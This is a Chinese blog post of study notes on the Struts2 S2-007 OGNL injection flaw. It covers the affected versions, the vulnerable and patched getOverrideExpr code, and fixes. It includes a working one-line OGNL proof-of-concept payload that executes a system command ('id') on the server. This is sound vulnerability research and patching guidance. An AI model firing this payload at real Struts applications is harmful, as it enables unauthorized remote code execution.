(注入)(RCE)(Struts2)s2-007漏洞学习笔记

写在前面

这篇文章是关于作者学习s2-007漏洞的笔记
关于这篇文章,如果有建议或问题请留言或联系h3llow0rld@foxmail.com

正文

漏洞分析

漏洞详情页
环境获取
如果想远程调试,参考这篇文章

影响版本

Struts 2.0.0 - Struts 2.2.3

漏洞原理

struts2可以为表单的每个字段设置限定条件并且能依据条件进行简单的类型转换,如果类型转换错误,拦截器会将用户的输入取出,进行字符串拼接后插入值栈,然后对标签进行二次表达式解析,造成OGNL注入

// com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor#getOverrideExpr
protected Object getOverrideExpr(ActionInvocation invocation, Object value) {  
    return "'" + value + "'";  
}
利用条件/测试场景

1.利用条件
有表单,并且应用为表单配置了对应的Validation.xml规则文件
2.测试场景
只要存在表单就可以使用payload进行测试

利用方法

PoC:' + (#_memberAccess["allowStaticMethodAccess"]=true,#context["xwork.MethodAccessor.denyMethodExecution"]=false,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

如何修复
紧急处理方法(仅供参考)

删掉对应的Validation.xml,手动实现对字段的校验和转换

补丁修复方法

对输入进行转义

// com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor#getOverrideExpr
protected Object getOverrideExpr(ActionInvocation invocation, Object value) {  
    ValueStack stack = invocation.getStack();  
  
    try {  
        stack.push(value);  
  
        return escape(stack.findString("top"));  
    } finally {  
        stack.pop();  
    }  
}
  • 13
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值